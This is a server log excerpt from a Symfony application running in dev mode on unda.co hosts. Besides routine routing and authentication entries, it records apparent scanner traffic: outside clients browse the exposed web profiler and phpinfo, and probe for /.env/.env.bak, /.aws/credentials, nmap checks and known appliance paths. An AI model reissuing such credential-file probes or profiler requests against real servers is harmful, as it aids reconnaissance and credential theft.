  5097. [2025-12-19 08:22:53] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  5098. [2025-12-19 08:22:53] security.DEBUG: Calling Authentication entry point. [] []
  5099. [2025-12-19 08:22:54] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"POST"} []
  5100. [2025-12-19 08:22:54] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  5101. [2025-12-19 08:22:54] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  5102. [2025-12-19 08:22:54] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  5103. [2025-12-19 08:22:54] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  5104. [2025-12-19 08:22:54] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  5105. [2025-12-19 08:22:54] security.DEBUG: Calling Authentication entry point. [] []
  5106. [2025-12-19 08:27:53] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7d563a","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7d563a?panel=security","method":"GET"} []
  5107. [2025-12-19 08:27:53] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  5108. [2025-12-19 08:31:48] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  5109. [2025-12-19 08:31:49] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  5110. [2025-12-19 08:32:30] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=47.242.70.104&limit=10","method":"GET"} []
  5111. [2025-12-19 08:32:30] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=47.242.70.104&limit=10","method":"GET"} []
  5112. [2025-12-19 08:32:35] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://auth.unda.co/_profiler/phpinfo","method":"GET"} []
  5113. [2025-12-19 08:36:50] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3d0bc2","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/3d0bc2?panel=twig","method":"GET"} []
  5114. [2025-12-19 08:36:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  5115. [2025-12-19 08:39:49] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=44.192.15.107&limit=10","method":"GET"} []
  5116. [2025-12-19 08:39:49] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=44.192.15.107&limit=10","method":"GET"} []
  5117. [2025-12-19 08:43:02] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=199.45.154.156&limit=10","method":"GET"} []
  5118. [2025-12-19 08:43:02] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=199.45.154.156&limit=10","method":"GET"} []
  5119. [2025-12-19 08:45:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3d0bc2","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/3d0bc2?panel=time","method":"GET"} []
  5120. [2025-12-19 08:45:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  5121. [2025-12-19 08:46:15] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  5122. [2025-12-19 08:46:41] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://unda.co/_profiler/phpinfo","method":"GET"} []
  5123. [2025-12-19 08:46:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env/.env.bak"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env/.env.bak\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5124. [2025-12-19 08:46:48] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  5125. [2025-12-19 08:46:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.aws/credentials"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.aws/credentials\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5126. [2025-12-19 08:48:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5127. [2025-12-19 08:49:43] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
  5128. [2025-12-19 08:50:28] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
  5129. [2025-12-19 08:50:29] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"6f8fb1","_route":"_wdt"},"request_uri":"https://auth.unda.co/_wdt/6f8fb1","method":"GET"} []
  5130. [2025-12-19 08:51:16] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  5131. [2025-12-19 08:51:17] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
  5132. [2025-12-19 08:51:17] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  5133. [2025-12-19 08:51:17] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  5134. [2025-12-19 08:51:17] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  5135. [2025-12-19 08:51:17] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  5136. [2025-12-19 08:51:17] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  5137. [2025-12-19 08:51:17] security.DEBUG: Calling Authentication entry point. [] []
  5138. [2025-12-19 08:51:18] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
  5139. [2025-12-19 08:52:22] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/?XDEBUG_SESSION_START=phpstorm","method":"GET"} []
  5140. [2025-12-19 08:53:41] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3d0bc2","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/3d0bc2?panel=security","method":"GET"} []
  5141. [2025-12-19 08:53:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  5142. [2025-12-19 08:54:42] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=35.198.60.231&limit=10","method":"GET"} []
  5143. [2025-12-19 08:54:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=35.198.60.231&limit=10","method":"GET"} []
  5144. [2025-12-19 08:55:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4e9618","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/4e9618","method":"GET"} []
  5145. [2025-12-19 08:55:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar","method":"GET"} []
  5146. [2025-12-19 08:56:33] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
  5147. [2025-12-19 09:00:28] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"418d56","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/418d56?panel=exception","method":"GET"} []
  5148. [2025-12-19 09:00:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
  5149. [2025-12-19 09:01:58] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3d0bc2","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/3d0bc2?panel=request","method":"GET"} []
  5150. [2025-12-19 09:01:58] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  5151. [2025-12-19 09:06:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /hello.world"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /hello.world\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5152. [2025-12-19 09:12:03] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
  5153. [2025-12-19 09:13:04] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://unda.co/_profiler/open?file=src%2FHona%2FLandingBundle%2FController%2FDefaultController.php&line=14","method":"GET"} []
  5154. [2025-12-19 09:14:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5155. [2025-12-19 09:15:37] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
  5156. [2025-12-19 09:16:26] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
  5157. [2025-12-19 09:18:48] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
  5158. [2025-12-19 09:19:24] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
  5159. [2025-12-19 09:20:14] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  5160. [2025-12-19 09:22:26] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3d0bc2","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/3d0bc2?panel=config","method":"GET"} []
  5161. [2025-12-19 09:22:26] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  5162. [2025-12-19 09:28:37] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4e9618","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/4e9618?panel=config","method":"GET"} []
  5163. [2025-12-19 09:28:37] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  5164. [2025-12-19 09:28:52] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
  5165. [2025-12-19 09:30:21] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?panel=db","method":"GET"} []
  5166. [2025-12-19 09:30:21] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  5167. [2025-12-19 09:30:43] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3d0bc2","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/3d0bc2?panel=cache","method":"GET"} []
  5168. [2025-12-19 09:30:43] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  5169. [2025-12-19 09:30:54] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.hona.mx/","method":"GET"} []
  5170. [2025-12-19 09:30:54] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  5171. [2025-12-19 09:30:54] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  5172. [2025-12-19 09:30:54] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  5173. [2025-12-19 09:30:54] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  5174. [2025-12-19 09:30:54] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  5175. [2025-12-19 09:30:54] security.DEBUG: Calling Authentication entry point. [] []
  5176. [2025-12-19 09:30:56] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.hona.mx/","method":"GET"} []
  5177. [2025-12-19 09:30:56] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  5178. [2025-12-19 09:30:56] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  5179. [2025-12-19 09:30:56] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  5180. [2025-12-19 09:30:56] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://ec2-35-175-10-94.compute-1.amazonaws.com/","method":"GET"} []
  5181. [2025-12-19 09:30:56] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webui"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webui\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5182. [2025-12-19 09:30:56] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /cgi-mod/header_logo.cgi"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /cgi-mod/header_logo.cgi\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5183. [2025-12-19 09:30:56] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /health"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /health\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5184. [2025-12-19 09:30:56] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /nmaplowercheck1766136655"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /nmaplowercheck1766136655\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5185. [2025-12-19 09:30:56] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  5186. [2025-12-19 09:30:56] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  5187. [2025-12-19 09:30:56] security.DEBUG: Calling Authentication entry point. [] []
  5188. [2025-12-19 09:30:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /dana-cached/hc/HostCheckerInstaller.osx"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /dana-cached/hc/HostCheckerInstaller.osx\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5189. [2025-12-19 09:30:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webui"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webui\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5190. [2025-12-19 09:30:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /human.aspx"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /human.aspx\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5191. [2025-12-19 09:30:58] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://ec2-35-175-10-94.compute-1.amazonaws.com/","method":"GET"} []
  5192. [2025-12-19 09:30:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/v2/about"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/v2/about\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5193. [2025-12-19 09:30:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /+CSCOE+/logon.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /+CSCOE+/logon.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5194. [2025-12-19 09:30:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /HNAP1"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /HNAP1\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
